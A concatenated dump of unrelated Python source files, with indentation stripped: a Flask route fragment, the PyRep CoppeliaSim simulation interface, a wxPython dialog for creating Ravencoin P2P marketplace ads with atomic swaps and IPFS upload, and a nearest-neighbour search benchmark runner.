@app.route('/examples')
def see_examples():
return render_template('examples.html')
@app.errorhandler(404)
def page_not_found(e):
return redirect('/')
@app.route('/output/<filename>')
def output_file(filename):
return send_from_directory(os.path.abspath(app.config['OUTPUT_FOLDER']),filename)
|
pyrep.py | import numpy as np
from contextlib import contextmanager
from pyrep.backend import sim, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
from pyrep.backend import sim
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
import warnings
def fileno(file_or_fd):
fd = getattr(file_or_fd, 'fileno', lambda: file_or_fd)()
if not isinstance(fd, int):
raise ValueError("Expected a file (`.fileno()`) or a file descriptor")
return fd
@contextmanager
def stdout_redirected(to=os.devnull, stdout=None):
if stdout is None:
stdout = sys.stdout
stdout_fd = fileno(stdout)
with os.fdopen(os.dup(stdout_fd), 'wb') as copied:
stdout.flush()
try:
os.dup2(fileno(to), stdout_fd)
except ValueError:
with open(to, 'wb') as to_file:
os.dup2(to_file.fileno(), stdout_fd)
try:
yield stdout
finally:
stdout.flush()
os.dup2(copied.fileno(), stdout_fd)
class PyRep(object):
"""Used for interfacing with the CoppeliaSim simulation.
Can be used for starting, stopping, and stepping the simulation. As well
as getting, and creating scene objects and robots.
"""
def __init__(self):
self.running = False
self._process = None
self._robot_to_count = {}
self.connected = False
self._ui_thread = None
self._responsive_ui_thread = None
self._step_lock = Lock()
self._init_thread_id = None
self._shutting_down = False
self._handles_to_objects = {}
if 'COPPELIASIM_ROOT' not in os.environ:
raise PyRepError(
'COPPELIASIM_ROOT not defined. See installation instructions.')
self._vrep_root = os.environ['COPPELIASIM_ROOT']
if not os.path.exists(self._vrep_root):
raise PyRepError(
'COPPELIASIM_ROOT was not a correct path. '
'See installation instructions')
def _run_ui_thread(self, scene_file: str, headless: bool, write_coppeliasim_stdout_to_file: bool) -> None:
# Need this otherwise extensions will not be loaded
os.chdir(self._vrep_root)
options = sim.sim_gui_headless if headless else sim.sim_gui_all
if write_coppeliasim_stdout_to_file:
with open('/tmp/CoppeliaSimLog' + str(time.perf_counter()).replace('.', '') + '.txt', 'w+') as f, \
stdout_redirected(f):
sim.simExtLaunchUIThread(options=options, scene=scene_file, pyrep_root=self._vrep_root)
else:
sim.simExtLaunchUIThread(options=options, scene=scene_file, pyrep_root=self._vrep_root)
def _run_responsive_ui_thread(self) -> None:
while True:
if not self.running:
with self._step_lock:
if self._shutting_down or sim.simExtGetExitRequest():
break
sim.simExtStep(False)
time.sleep(0.01)
# If the exit request was from the UI, then call shutdown, otherwise
# shutdown caused this thread to terminate.
if not self._shutting_down:
self.shutdown()
def launch(self, scene_file="", headless=False, responsive_ui=False,
blocking=False, write_coppeliasim_stdout_to_file=False) -> None:
"""Launches CoppeliaSim.
Launches the UI thread, waits until the UI thread has finished, this
results in the current thread becoming the simulation thread.
:param scene_file: The scene file to load. Empty string for empty scene.
:param headless: Run CoppeliaSim in simulation mode.
:param responsive_ui: If True, then a separate thread will be created to
asynchronously step the UI of CoppeliaSim. Note, that will reduce
the responsiveness of the simulation thread.
:param blocking: Causes CoppeliaSim to launch as if running the default
c++ client application. This is causes the function to block.
For most users, this will be set to False.
:param write_coppeliasim_stdout_to_file: Causes CoppeliaSim to write the stdout to files in /tmp, rather than
the terminal stdout as the python script is run. This helps reduce screen clutter, particularly if using
multiple PyRep instances with multiprocessing, for example.
"""
abs_scene_file = os.path.abspath(scene_file)
if len(scene_file) > 0 and not os.path.isfile(abs_scene_file):
raise PyRepError('Scene file does not exist: %s' % scene_file)
cwd = os.getcwd()
self._ui_thread = threading.Thread(target=self._run_ui_thread,
args=(abs_scene_file, headless, write_coppeliasim_stdout_to_file))
self._ui_thread.daemon = True
self._ui_thread.start()
while not sim.simExtCanInitSimThread():
time.sleep(0.1)
sim.simExtSimThreadInit()
time.sleep(0.2) # Stops CoppeliaSim crashing if restarted too quickly.
if blocking:
while not sim.simExtGetExitRequest():
sim.simExtStep()
self.shutdown()
elif responsive_ui:
self._responsive_ui_thread = threading.Thread(
target=self._run_responsive_ui_thread)
self._responsive_ui_thread.daemon = True
try:
self._responsive_ui_thread.start()
except (KeyboardInterrupt, SystemExit):
if not self._shutting_down:
self.shutdown()
sys.exit()
self.step()
else:
self.step()
os.chdir(cwd) # Go back to the previous cwd
def script_call(self, function_name_at_script_name: str,
script_handle_or_type: int,
ints=(), floats=(), strings=(), bytes='') -> (
Tuple[List[int], List[float], List[str], str]):
"""Calls a script function (from a plugin, the main client application,
or from another script). This represents a callback inside of a script.
:param function_name_at_script_name: A string representing the function
name and script name, e.g. myFunctionName@theScriptName. When the
script is not associated with an object, then just specify the
function name.
:param script_handle_or_type: The handle of the script, otherwise the
type of the script.
:param ints: The input ints to the script.
:param floats: The input floats to the script.
:param strings: The input strings to the script.
:param bytes: The input bytes to the script (as a string).
:return: Any number of return values from the called Lua function.
"""
return utils.script_call(
function_name_at_script_name, script_handle_or_type, ints, floats,
strings, bytes)
def shutdown(self) -> None:
"""Shuts down the CoppeliaSim simulation.
"""
if self._ui_thread is None:
raise PyRepError(
'CoppeliaSim has not been launched. Call launch first.')
if self._ui_thread is not None:
self._shutting_down = True
self.stop()
self.step_ui()
sim.simExtPostExitRequest()
sim.simExtSimThreadDestroy()
self._ui_thread.join()
if self._responsive_ui_thread is not None:
self._responsive_ui_thread.join()
# CoppeliaSim crashes if new instance opened too quickly after shutdown.
# TODO: A small sleep stops this for now.
time.sleep(0.1)
self._ui_thread = None
self._shutting_down = False
def start(self) -> None:
"""Starts the physics simulation if it is not already running.
"""
if self._ui_thread is None:
raise PyRepError(
'CoppeliaSim has not been launched. Call launch first.')
if not self.running:
sim.simStartSimulation()
self.running = True
def stop(self) -> None:
"""Stops the physics simulation if it is running.
"""
if self._ui_thread is None:
raise PyRepError(
'CoppeliaSim has not been launched. Call launch first.')
if self.running:
sim.simStopSimulation()
self.running = False
# Need this so the UI updates
[self.step() for _ in range(5)] # type: ignore
def step(self) -> None:
"""Execute the next simulation step.
If the physics simulation is not running, then this will only update
the UI.
"""
with self._step_lock:
sim.simExtStep()
def step_ui(self) -> None:
"""Update the UI.
This will not execute the next simulation step, even if the physics
simulation is running.
This is only applicable when PyRep was launched without a responsive UI.
"""
with self._step_lock:
sim.simExtStep(False)
def set_simulation_timestep(self, dt: float) -> None:
"""Sets the simulation time step. Default is 0.05.
:param dt: The time step value in seconds.
"""
sim.simSetFloatParameter(sim.sim_floatparam_simulation_time_step, dt)
if not np.allclose(self.get_simulation_timestep(), dt):
warnings.warn('Could not change simulation timestep. You may need '
'to change it to "custom dt" using simulation '
'settings dialog.')
def get_simulation_timestep(self) -> float:
"""Gets the simulation time step.
:return: The time step value in seconds.
"""
return sim.simGetSimulationTimeStep()
def set_simulation_passes_per_rendering_pass(self, ppf: int) -> None:
"""Sets the number of simulation passes per rendering pass.
:param ppf: Number of simulation passes per rendering pass.
"""
sim.simSetSimulationPassesPerRenderingPass(ppf)
if not np.allclose(self.get_simulation_passes_per_rendering_pass(), ppf):
warnings.warn('Could not change the number of simulation passes '
'per rendering pass. You may need to change it the '
'time step to "custom dt" using simulation settings '
'dialog.')
def get_simulation_passes_per_rendering_pass(self) -> float:
"""Gets the number of simulation passes per rendering pass.
:return: Number of simulation passes per rendering pass.
"""
return sim.simGetSimulationPassesPerRenderingPass()
def set_configuration_tree(self, config_tree: bytes) -> None:
"""Restores configuration information previously retrieved.
Configuration information (object relative positions/orientations,
joint/path values) can be retrieved with
:py:meth:`Object.get_configuration_tree`. Dynamically simulated
objects will implicitly be reset before the command is applied
(i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
before).
:param config_tree: The configuration tree to restore.
"""
sim.simSetConfigurationTree(config_tree)
def group_objects(self, objects: List[Shape]) -> Shape:
"""Groups several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single grouped shape.
"""
handles = [o.get_handle() for o in objects]
handle = sim.simGroupShapes(handles)
return Shape(handle)
def merge_objects(self, objects: List[Shape]) -> Shape:
"""Merges several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single merged shape.
"""
handles = [o.get_handle() for o in objects]
# FIXME: sim.simGroupShapes(merge=True) won't return correct handle,
# so we use name to find correct handle of the merged shape.
name = objects[-1].get_name()
sim.simGroupShapes(handles, merge=True)
return Shape(name)
def export_scene(self, filename: str) -> None:
"""Saves the current scene.
:param filename: scene filename. The filename extension is required
("ttt").
"""
sim.simSaveScene(filename)
def import_model(self, filename: str) -> Object:
""" Loads a previously saved model.
:param filename: model filename. The filename extension is required
("ttm"). An optional "@copy" can be appended to the filename, in
which case the model's objects will be named/renamed as if an
associated script was attached to the model.
:return: The imported model.
"""
handle = sim.simLoadModel(filename)
return utils.to_type(handle)
def create_texture(self, filename: str, interpolate=True, decal_mode=False,
repeat_along_u=False, repeat_along_v=False
) -> Tuple[Shape, Texture]:
"""Creates a planar shape that is textured.
:param filename: Path to the texture to load.
:param interpolate: Adjacent texture pixels are not interpolated.
:param decal_mode: Texture is applied as a decal (its appearance
won't be influenced by light conditions).
:param repeat_along_u: Texture will be repeated along the U direction.
:param repeat_along_v: Texture will be repeated along the V direction.
:return: A tuple containing the textured plane and the texture.
"""
options = 0
if not interpolate:
options |= 1
if decal_mode:
options |= 2
if repeat_along_u:
options |= 3
if repeat_along_v:
options |= 4
handle = sim.simCreateTexture(filename, options)
s = Shape(handle)
return s, s.get_texture()
def get_objects_in_tree(self, root_object=None, *args, **kwargs
) -> List[Object]:
"""Retrieves the objects in a given hierarchy tree.
:param root_object: The root object in the tree. Pass None to retrieve
all objects in the configuration tree. :py:class:`Object` or `int`.
:param object_type: The object type to retrieve.
One of :py:class:`.ObjectType`.
:param exclude_base: Exclude the tree base from the returned list.
:param first_generation_only: Include in the returned list only the
object's first children. Otherwise, entire hierarchy is returned.
:return: A list of objects in the hierarchy tree.
"""
return Object._get_objects_in_tree(root_object, *args, **kwargs)
def get_collection_handle_by_name(self, collection_name: str) -> int:
"""Retrieves the integer handle for a given collection.
:param collection_name: Name of the collection to retrieve the integer handle for
:return: An integer handle for the collection
"""
return sim.simGetCollectionHandle(collection_name)
|
wxRavenP2PMarketNewAdDialogLogic.py | '''
Created on 8 janv. 2022
@author: slinux
'''
#from .wxRavenTutorialPluginDesign import *
import threading
import time
from .wxRavenP2PMarketDesign import *
from wxRavenGUI.application.wxcustom import *
from libs.RVNpyRPC._P2PmarketPlace import RavencoinP2PMarketPlaceAd, _P2PMARKET_ID_
from .wxRavenCreateAtomicSwapLogic import *
#from .wxRavenP2PMarket_AtomicTxPanel import *
from .wxRavenP2PMarket_RawTxPanel import *
import os
import time
from datetime import datetime
import logging
class wxRavenP2PMarket_NewAdWithLogic(wxRavenP2PMarket_NewAdDialog):
'''
classdocs
'''
#
#
# Datas for the plugin display style
#
#
view_base_name = "New P2P Market Ad"
view_name = "New P2P Market Ad"
parent_frame = None
default_position = "dialog"
icon = 'p2p_icon_new'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self,parent, parentFrame, position = "dialog", viewName= "New P2P Market Ad", isInternalPluginView=True):
'''
Constructor
'''
super().__init__(parent=parent)
#
# Your constructor here
#
self.view_base_name = "New P2P Market Ad"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self.parent = parent
self.logger = logging.getLogger('wxRaven')
self.m_toggleAssistant.SetBitmap(parentFrame.RessourcesProvider.GetImage('wizard_ico'))
self.m_toggleRawTxDatas.SetBitmap(parentFrame.RessourcesProvider.GetImage('raw_datas'))
self._useWizard = True
self._timestamp = round(time.time() * 1000)
self._filegenerated = False
self._validChanel = False
self._MethodsPanelList = {}
self.TxMethodPanelSizer = None
#
#
# Wizard default datas
#
self._newAdObject = RavencoinP2PMarketPlaceAd()
self._newAdObject._adType=0
self._newAdObject._adTxType=0
self._newAdObject._adOrders=1
self._newAdObject._adAssetQt=1
self._newAdObject.m_AdAssetPrice='rvn'
self._newAdObject._adPrice=200
self._forceManual = False
self.savepath = self.parent_frame.Paths['USERDATA'] + 'p2pmarket/'
#
#
#
'''
self._MethodsPanelList = {0:wxRavenP2PMarket_NewAtomiSwapWithLogic,
1:wxRavenP2PMarket_NewAtomiSwapWithLogic,
2:wxRavenP2PMarket_NewAtomiSwapWithLogic}
'''
#_defaultAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_AdAtomiSwapWithLogic, True)
_defaultAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_NewAtomiSwapWithLogic, True)
_RawAtomicSwapPanel = self.__LoadMethodPanel__(wxRavenP2PMarket_RawAtomiSwapWithLogic, False)
self._MethodsPanelList = {0:_defaultAtomicSwapPanel ,
1:None ,
2: _RawAtomicSwapPanel}
self.setupPanel()
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
#if not isInternalPluginView:
# parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
self.Layout()
self.SetSizerAndFit(self.GetSizer(), deleteOld=False)
self.parent.ResizeDialog()
#
# If your app need to load a bunch of data, it may want to wait the app is ready
# specially at startup + resume of plugins
# Use this thread method + callback to manage the 1sec/2sec init delay
#
#
#self.waitApplicationReady()
def OnWizardButtonToggle(self, evt):
self._useWizard = self.m_toggleAssistant.GetValue()
if self._useWizard:
self.m_assistantPanel.Show()
self.m_AdFileIPFSHash.Enable(enable=False)
self.m_PreviewAdBt.Show()
if self._filegenerated:
self.m_GeneraeteAdBt.Enable(True)
else:
self.m_GeneraeteAdBt.Enable(False)
else:
self.m_assistantPanel.Hide()
self.m_AdFileIPFSHash.Enable(enable=True)
self.m_PreviewAdBt.Hide()
#self.m_staticline18.Hide()
#self.m_txDatas.Hide()
self.m_GeneraeteAdBt.Enable(True)
#self.SetSizerAndFit(sizer, deleteOld=True)
self.SetSizerAndFit(self.GetSizer(), deleteOld=False)
#self.Layout()
self.parent.ResizeDialog()
def OnGenerateButtonClick(self, evt):
_userCheck = UserQuestion(self, "Once publish you cannot modify the Ad anymore, continue ?")
if _userCheck:
ravencoin = self.parent_frame.getRvnRPC()
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
p2p_channel_asset_target_address = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_target_address']
p2p_market_change_address = myPlugin.PLUGIN_SETTINGS['p2p_market_change_address']
_hashFile = self.m_AdFileIPFSHash.GetValue()
_fakeResult = {'result':None , 'error': {'code':-1, 'message': f"Unknown error, please check logs."}}
try:
_fakeResult = ravencoin.p2pmarket.PublishNewP2PAd(self._newAdObject._adP2PChannelAsset, p2p_channel_asset_target_address, _hashFile, p2p_market_change_address, expiration=200000000 )
#UserInfo(self, "Your asset is on the P2P Marketplace !")
except Exception as e:
self.parent_frame.Log("Unable to load publish p2p Market ad." , type="error")
_fakeResult = {'result':None , 'error': {'code':-1, 'message': e}}
ReportRPCResult(self.parent_frame, _fakeResult, "success", "Your asset is on the P2P Marketplace !", "Unable to publish your ad.", False)
def OnPreviewAdButtonClick(self, evt):
self.OnAdTypeChanged(None)
self.OnTitleChanged(None)
#self.OnAssetChanged(None)
self.OnTxMethodChanged(None)
#self.OnQuantityChanged(None)
#self.OnPriceChanged(None)
self.OnLinkChanged(None)
self.OnDescriptionChanged(None)
self.OnP2PChannelChanged(None)
self.OnKeywordChanged(None)
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
ravencoin = self.parent_frame.getRvnRPC()
_hasvalidTx = False
_hasTx = False
print(self._newAdObject)
_fakeResult = {'result':None , 'error': {'code':-1, 'message': f"Unknown error, please check logs."}}
if self._newAdObject.isEmptyTxData():
_doCreateSwap = False
_doCreateSwap = UserQuestion(self, "The atomic swap transaction is not yet created, create it now ?")
if _doCreateSwap :
self._newAdObject = ravencoin.p2pmarket.CreateAtomicSwapTransaction(self._newAdObject)
self.logger.info(f"CreateAtomicSwapTransaction DONE = {self._newAdObject._adTxDatas}")
if self._newAdObject.isEmptyTxData():
self.m_P2PmethodErrorText.SetLabel("Error : No Atomicswap datas tx generated !")
self.m_bitmap38.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
#self.m_atomicTransactionUserFeedback.SetLabel("Error : No Atomicswap datas tx generated")
else:
self.m_P2PmethodErrorText.SetLabel("P2P Method : Atomicswap datas found !")
self.m_bitmap38.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
self.LockAllMethodPanel(True)
self.SetManualPanelValue(self._newAdObject._adTxDatas)
self.logger.info(f"P2P Method : Atomicswap datas found , verifying TX")
_hasTx=True
try:
_valid, _data = myPlugin.DecodeTx(self._newAdObject._adTxDatas[0])
if _valid:
_hasvalidTx = True
except Exception as e:
self.logger.error(f"P2P Method : error in TX")
_hasvalidTx = False
self.Layout()
self.m_assistantPanel.Layout()
_hash = None
if _hasTx and _hasvalidTx:
pass
_filtetosave = self.savepath + 'p2p_market_order' + str(self._timestamp) + '.json'
f = open(_filtetosave, "w")
f.write(str(self._newAdObject.JSON()))
f.close()
#
#ALL GOOD
#self.m_atomicTransactionUserFeedback.SetLabel(self._newAdObject._adTxDatas)
ipfsPlugins = self.parent_frame.GetPlugin('IPFS')
_hash = None
if ipfsPlugins != None:
try:
_hash = ipfsPlugins.UploadJSONToIPFS_RPC(str(self._newAdObject.JSON()))
except Exception as e:
self.parent_frame.Log("Unable to load upload p2p Market json datas to IPFS." , type="error")
if _hash!=None:
self.m_AdFileIPFSHash.SetValue(str(_hash))
if _hash == None:
#UserInfo(self, f"No IPFS Plugin or an error occured, filed has been saved in {_filtetosave} for manual upload.")
UserAdvancedMessage(self.parent_frame, f"No IPFS Plugin or an error occured, filed has been saved in {_filtetosave} for manual upload.", "info", msgdetails=_filtetosave, showCancel=False)
else:
#UserError(self, f"An error occured while creating the atomic swap, please retry.")
UserAdvancedMessage(self.parent_frame, f"An error occured while creating the atomic swap, please retry.", "error", msgdetails='', showCancel=False)
self.m_toggleRawTxDatas.SetValue(True)
self.SwitchMethodPanel(manual=True)
if _hash != None :
self.m_GeneraeteAdBt.Enable(True)
#UserInfo(self, f"Ad created, ready for upload.")
UserAdvancedMessage(self.parent_frame, f"Ad created, ready for upload.", "info", msgdetails='', showCancel=False)
#else:
# self.parent_frame.Log("Unable to load upload p2p Market json datas to IPFS." , type="error")
self.logger.info(self._newAdObject.JSON())
#self._newAdObject._adAsset =
def OnAdTypeChanged(self, evt):
self._newAdObject._adType = self.m_radioBox1.GetSelection()
self.OnTxMethodChanged(evt)
def OnTitleChanged(self, evt):
self._newAdObject._adTitle = self.m_AdTitle.GetValue()
"""
def OnAssetChanged(self, evt):
self._newAdObject._adAsset = self.m_AdAssetChoice.GetString(self.m_AdAssetChoice.GetCurrentSelection())
"""
def OnToggleRawTxData(self, evt):
self.OnTxMethodChanged(evt)
def OnCreateUTXODialogClicked(self, evt):
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
myPlugin.CreateNewUTXO()
def OnTxMethodChanged(self, evt):
_str = self.m_txMethod.GetString(self.m_txMethod.GetCurrentSelection())
self.logger.info(_str)
self._newAdObject._adTxType = _P2PMARKET_ID_[_str]
_forceManual = self.m_toggleRawTxDatas.GetValue()
self._forceManual = _forceManual
self.SwitchMethodPanel(manual=_forceManual)
def LockAllMethodPanel(self, locking):
for panKey in self._MethodsPanelList:
pan = self._MethodsPanelList[panKey]
self.logger.info(f'found {panKey} {pan}')
if pan != None:
self.logger.info(f'locking {panKey}')
try:
pan.LockPanel(locking)
except Exception as e:
pass
def SetManualPanelValue(self, val):
_manualPanel = self._MethodsPanelList[2]
if _manualPanel != None:
_manualPanel.m_rawDatasText.SetValue(str(val))
def SwitchMethodPanel(self,manual=False):
self.logger.info(f"SwitchMethodPanel {manual}")
_type = self._newAdObject._adTxType
_adtype = self._newAdObject._adType
if self._MethodsPanelList == {}:
return
if manual == True:
_type = 2
for panKey in self._MethodsPanelList:
pan = self._MethodsPanelList[panKey]
self.logger.info(f'found {panKey} {pan}')
if pan != None:
self.logger.info(f'hiding {panKey}')
pan.Hide()
self.logger.info(_type)
_toShow = self._MethodsPanelList[_type]
if _toShow != None:
_toShow.Show()
self.logger.info(f"onswapchangedforce = {_adtype}")
_toShow.OnSwapTypeChanged(evt=None ,forceId=_adtype)
#w, h = _toShow.GetSize()
#w = h
#_toShow.SetSize(w, 150)
#self.m_txMethodPanel.SetSize(w, 150)
self.Layout()
#panel.SetSize(w, h)
#_toShow.SetSizerAndFit(self.TxMethodPanelSizer,deleteOld=False)
#self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer,deleteOld=False)
#self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer)
"""
def OnQuantityChanged(self, evt):
self._newAdObject._adAssetQt = self.m_AdAssetQt.GetValue()
def OnPriceChanged(self, evt):
self._newAdObject._adPrice = self.m_AdAssetPrice.GetValue()
"""
def OnLinkChanged(self, evt):
self._newAdObject._adExternalLink = self.m_AdLink.GetValue()
def OnDescriptionChanged(self, evt):
self._newAdObject._adDescription = self.m_AdDescription.GetValue()
def OnKeywordChanged(self, evt):
self._newAdObject._adKeywords = self.m_AdKeyword.GetValue()
def __checkChannel__(self):
self._validChanel = False
try:
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
ravencoin = myPlugin.__getNetwork__()
#balanceChanel = ravencoin.asset.GetBalance(self._newAdObject._adP2PChannelAsset)
self._validChanel = ravencoin.p2pmarket.CheckP2PAnnouncerAccount(self._newAdObject._adAddress, self._newAdObject._adP2PChannelAsset, setupIfNotReady=False , password="")
#if balanceChanel > 0.2:
# self._validChanel = True
except Exception as e:
self.parent_frame.Log("Unable to load Chanel '{self._newAdObject._adP2PChannelAsset}' balance" , type="warning")
if self._validChanel:
self.m_bitmap16.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
else:
self.m_bitmap16.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('warning_2'))
self.Layout()
return self._validChanel
def OnP2PChannelChanged(self, evt):
_str = self.m_AdP2PChannelChoice.GetString(self.m_AdP2PChannelChoice.GetCurrentSelection())
self._newAdObject._adP2PChannelAsset = _str
self.__checkChannel__()
def __LoadMethodPanel__(self, panel, show=False):
if self.TxMethodPanelSizer == None:
self.TxMethodPanelSizer = wx.BoxSizer( wx.VERTICAL )
_newPanel = panel(self.m_txMethodPanel, self.parent_frame, isInternalPluginView=True, isInternalPanel=True, parentDataObj=self)
self.TxMethodPanelSizer.Add( _newPanel, 1, wx.ALL|wx.EXPAND, 5 )
if show:
self.SwitchMethodPanel(False)
self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer)
self.Layout()
return _newPanel
def setupPanel(self):
'''
self._MethodsPanelListClasses = {0:wxRavenP2PMarket_NewAtomiSwapWithLogic,
1:wxRavenP2PMarket_NewAtomiSwapWithLogic,
2:wxRavenP2PMarket_NewAtomiSwapWithLogic}
'''
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
ravencoin = myPlugin.__getNetwork__()
if not ravencoin.test_rpc_status():
UserError(self.parent_frame, "You must have an active connexion !")
#self.m_AdAssetChoice.Clear()
self.m_AdP2PChannelChoice.Clear()
'''
_allAdmins= ravencoin.asset.GetAllMyAssets()
'''
_allNotAdmins= ravencoin.asset.GetAllMyAssets(_excludeAdmin=True)
#self.logger.info(_allAdmins)
defaultChannel = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_default']
AnnouncerAddress = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_target_address']
self._newAdObject._adAddress = AnnouncerAddress
'''
for key in _allAdmins:
self.m_AdAssetChoice.Append(key)
'''
for key in _allNotAdmins:
self.m_AdP2PChannelChoice.Append(key)
_dc = self.m_AdP2PChannelChoice.FindString(defaultChannel)
if _dc != wx.NOT_FOUND:
self.m_AdP2PChannelChoice.SetSelection(_dc)
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.UpdateView,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(2)
wx.CallAfter(callback, ())
#Override the UpdateView method to define what happen when plugin call UpdateViews()
def UpdateView(self, evt=None):
self.UpdateDataFromPluginDatas()
self.Layout()
self.setupPanel()
#Example to show how plugin data are retreived
def UpdateDataFromPluginDatas(self):
try:
#myPluginData = self.parent_frame.GetPluginData("Tutorial","myPluginData2")
#myPluginSetting = self.parent_frame.GetPluginSetting("Tutorial","booleansetting")#SavePanelSettings GetPluginSetting
#
#Update your panel
#
#textToPrint = " booleansetting = " + str(myPluginSetting)
#textToPrint = textToPrint + "\n\n myPluginData2 = " + str(myPluginData)
#self.m_staticText2.SetLabel(str(textToPrint))
pass
except Exception as e:
self.parent_frame.Log("Unable to load p2p Market datas" , type="warning")
|
runner.py | import argparse
import json
import logging
import os
import threading
import time
import traceback
import colors
import docker
import numpy
import psutil
from benchmark.algorithms.definitions import (Definition,
instantiate_algorithm)
from benchmark.datasets import DATASETS, upload_accelerated, download_accelerated
from benchmark.results import store_results
from benchmark.sensors.power_capture import power_capture
from benchmark.t3.helper import t3_create_container
def run_individual_query(algo, X, distance, count, run_count, search_type):
best_search_time = float('inf')
for i in range(run_count):
print('Run %d/%d...' % (i + 1, run_count))
start = time.time()
if search_type == "knn":
algo.query(X, count)
total = (time.time() - start)
results = algo.get_results()
assert len(results) == len(X)
else:
algo.range_query(X, count)
total = (time.time() - start)
results = algo.get_range_results()
search_time = total
best_search_time = min(best_search_time, search_time)
attrs = {
"best_search_time": best_search_time,
"name": str(algo),
"run_count": run_count,
"distance": distance,
"type": search_type,
"count": int(count)
}
additional = algo.get_additional()
for k in additional:
attrs[k] = additional[k]
return (attrs, results)
def run(definition, dataset, count, run_count, rebuild,
upload_index=False, download_index=False,
blob_prefix="", sas_string=""):
algo = instantiate_algorithm(definition)
assert not definition.query_argument_groups \
or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
assert not upload_index or not download_index
ds = DATASETS[dataset]()
#X_train = numpy.array(D['train'])
X = ds.get_queries()
distance = ds.distance()
search_type = ds.search_type()
print(f"Running {definition.algorithm} on {dataset}")
print(fr"Got {len(X)} queries")
try:
# Try loading the index from the file
memory_usage_before = algo.get_memory_usage()
if download_index:
local_dir, index_prefix, components = algo.index_files_to_store(dataset)
remote_location = blob_prefix + '/' + algo.track() + '/' + algo.__str__() + '/' + DATASETS[dataset]().short_name() + '/'
for component in components:
download_accelerated(remote_location + index_prefix + component,
local_dir + '/' + index_prefix + component,
False, sas_string)
print("Index files downloaded.")
if algo.load_index(dataset):
print("Index loaded.")
else:
print("Index load failed.")
elif rebuild or not algo.load_index(dataset):
# Build the index if it is not available
t0 = time.time()
algo.fit(dataset)
build_time = time.time() - t0
print('Built index in', build_time)
else:
print("Loaded existing index")
index_size = algo.get_memory_usage() - memory_usage_before
print('Index memory footprint: ', index_size)
if upload_index:
print("Starting index upload...")
local_dir, index_prefix, components = algo.index_files_to_store(dataset)
remote_location = blob_prefix + '/' + algo.track() + '/' + algo.__str__() + '/' + DATASETS[dataset]().short_name()
for component in components:
upload_accelerated(local_dir, remote_location,
index_prefix + component, sas_string)
else:
print("Starting query")
query_argument_groups = definition.query_argument_groups
# Make sure that algorithms with no query argument groups still get run
# once by providing them with a single, empty, harmless group
if not query_argument_groups:
query_argument_groups = [[]]
for pos, query_arguments in enumerate(query_argument_groups, 1):
print("Running query argument group %d of %d..." %
(pos, len(query_argument_groups)))
if query_arguments:
algo.set_query_arguments(*query_arguments)
descriptor, results = run_individual_query(
algo, X, distance, count, run_count, search_type)
# A bit unclear how to set this correctly if we usually load from file
#descriptor["build_time"] = build_time
descriptor["index_size"] = index_size
descriptor["algo"] = definition.algorithm
descriptor["dataset"] = dataset
if power_capture.enabled():
power_stats = power_capture.run(algo, X, distance, count,
run_count, search_type, descriptor)
store_results(dataset, count, definition,
query_arguments, descriptor, results, search_type)
finally:
algo.done()
def run_from_cmdline(args=None):
parser = argparse.ArgumentParser('''
NOTICE: You probably want to run.py rather than this script.
''')
parser.add_argument(
'--dataset',
choices=DATASETS.keys(),
help=f'Dataset to benchmark on.',
required=True)
parser.add_argument(
'--algorithm',
help='Name of algorithm for saving the results.',
required=True)
parser.add_argument(
'--module',
help='Python module containing algorithm. E.g. "ann_benchmarks.algorithms.annoy"',
required=True)
parser.add_argument(
'--constructor',
help='Constructer to load from module. E.g. "Annoy"',
required=True)
parser.add_argument(
'--count',
help='k: Number of nearest neighbours for the algorithm to return.',
required=True,
type=int)
parser.add_argument(
'--rebuild',
help='re-build index even if it exists',
action='store_true')
parser.add_argument(
'--runs',
help='Number of times to run the algorihm. Will use the fastest run-time over the bunch.',
required=True,
type=int)
parser.add_argument(
'build',
help='JSON of arguments to pass to the constructor. E.g. ["angular", 100]'
)
parser.add_argument(
'queries',
help='JSON of arguments to pass to the queries. E.g. [100]',
nargs='*',
default=[])
parser.add_argument(
'--power-capture',
help='Power capture parameters for the T3 competition. '
'Format is "ip:port:capture_time_in_seconds (ie, 127.0.0.1:3000:10).',
default="")
parser.add_argument(
'--upload-index',
help='Upload index to cloud storage.',
action='store_true')
parser.add_argument(
'--download-index',
help='Download index from cloud storage.',
action='store_true')
parser.add_argument(
'--blob-prefix',
help='Azure blob prefix to upload index to or download index from.')
parser.add_argument(
'--sas-string',
help='SAS string to authenticate to Azure blob storage.')
args = parser.parse_args(args)
algo_args = json.loads(args.build)
print(algo_args)
